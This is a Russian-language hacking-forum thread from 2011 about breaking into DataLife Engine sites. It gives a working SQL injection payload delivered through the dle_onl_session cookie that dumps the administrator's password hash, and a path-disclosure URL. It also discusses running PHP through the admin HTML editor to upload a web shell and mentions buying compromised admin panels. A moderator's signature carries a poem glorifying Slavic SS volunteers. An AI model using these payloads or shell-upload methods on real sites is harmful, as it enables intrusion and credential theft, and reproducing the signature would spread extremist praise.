ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.07.2011, 22:14
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от slva2000
slva2000 said:
теги
не прокатывают в "Реактор HTML кода" Не прокатывают или просто phpinfo ты не видишь? Глянь соурс html - там наверняка увидешь свои теги и php код.
Лично я попробовал способ Kuteke на 8.2 - нифига код не исполняется, тупо выводится плейн текстом мое , а в исходниках движка даже намека на исполнение php в страницах нет.
Потом специально поставил dle 8.5, попробовал снова - точно так же плейнтекстом мне выдается в соурсе.
Kuteke, в какой версии DLE ты это пробовал?
|
|
|
28.07.2011, 23:24
|
|
Новичок
Регистрация: 18.04.2010
Сообщений: 0
Провел на форуме:
753
Репутация:
0
|
|
Есть ли что-нибудь более-менее серьезное в сборке DLE 8.5 от SoftDLE? (http://www.softdle.com/dle/177-dle-85.html)
Нашел только раскрытие путей
engine/ajax/pages.php?year[]=&month[]=&user[]=&day[]=
|
|
|
|
29.07.2011, 15:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
60692
Репутация:
6
|
|
попугай
Я пробовал 8.2, 8.5, 8.3! Пахало! Даже в разделе Продажа покупал админки и все ОК! Я кажется знаю ваши ошибки! Вы просто не ставите галку напротив "Нефильтрованный HTML"!
|
|
|
|
31.07.2011, 10:02
|
|
Новичок
Регистрация: 24.11.2008
Сообщений: 1
Провел на форуме:
7435
Репутация:
0
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]dle_onl_session[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#DD0000"]'+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,name,password)+from+dle_users+where+user_group=1+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+[/COLOR][/COLOR]
Через куки достается хеш админа.
Подскажите какой запрос сделать для заливки шелла? Или чего еще интересного можно наскулить)
гугл пробовал) те варианты выводят "1064" |
|
|
|
31.07.2011, 18:00
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Kuteke
Kuteke said:
попугай
Я пробовал 8.2, 8.5, 8.3! Пахало! Даже в разделе Продажа покупал админки и все ОК! Я кажется знаю ваши ошибки! Вы просто не ставите галку напротив "Нефильтрованный HTML"!
ставлю, конечно, делал как ты написал несколькими постами выше.
Отпиши мне в личку, скинь соурсы двжиков, на которых это работало, если не затруднит.
|
|
|
|
01.08.2011, 11:28
|
|
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696
Репутация:
-4
|
|
Сообщение от попугай
попугай said:
Не прокатывают или просто phpinfo ты не видишь? Глянь соурс html - там наверняка увидешь свои теги и php код.
Лично я попробовал способ
Kuteke
на 8.2 - нифига код не исполняется, тупо выводится плейн текстом мое , а в исходниках движка даже намека на исполнение php в страницах нет.
Потом специально поставил dle 8.5, попробовал снова - точно так же плейнтекстом мне выдается в соурсе.
Kuteke
, в какой версии DLE ты это пробовал?
Они именно затираются послеки клика по Ява-окну "Редактор HTML"-> "Отправить". Второй клик на открытие редактора, и теги уже затёрты, т.е. парсер при отправке отредактированного текста, их затирает.
|
|
|
|
01.08.2011, 11:35
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от slva2000
slva2000 said:
Они именно затираются послеки клика по Ява-окну "Редактор HTML"-> "Отправить". Второй клик на открытие редактора, и теги уже затёрты, т.е. парсер при отправке отредактированного текста, их затирает.
ну я визуальный редактор не использовал - в обычном текстовом поле прекрасно
|
|
|
|
24.08.2011, 02:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
так ребята, все что связано с покупкой не в этот раздел, здесь только то что найдено вами, ни какой коммерческой деятельности, попрошу не захломлять раздел ....Присутсвует слово куплю, значит вам разделом купля/продажа
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
03.09.2011, 18:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Как через админку залить шелл в версии 9.2
|
|
|
|
03.09.2011, 18:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
27755
Репутация:
0
|
|
насколько мне известно, то пока что - никак. начиная с версии какой то там, где в шаблоне пхп блочится шелл с админки залить нельзя. возможно ошибаюсь конечно, но так было.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
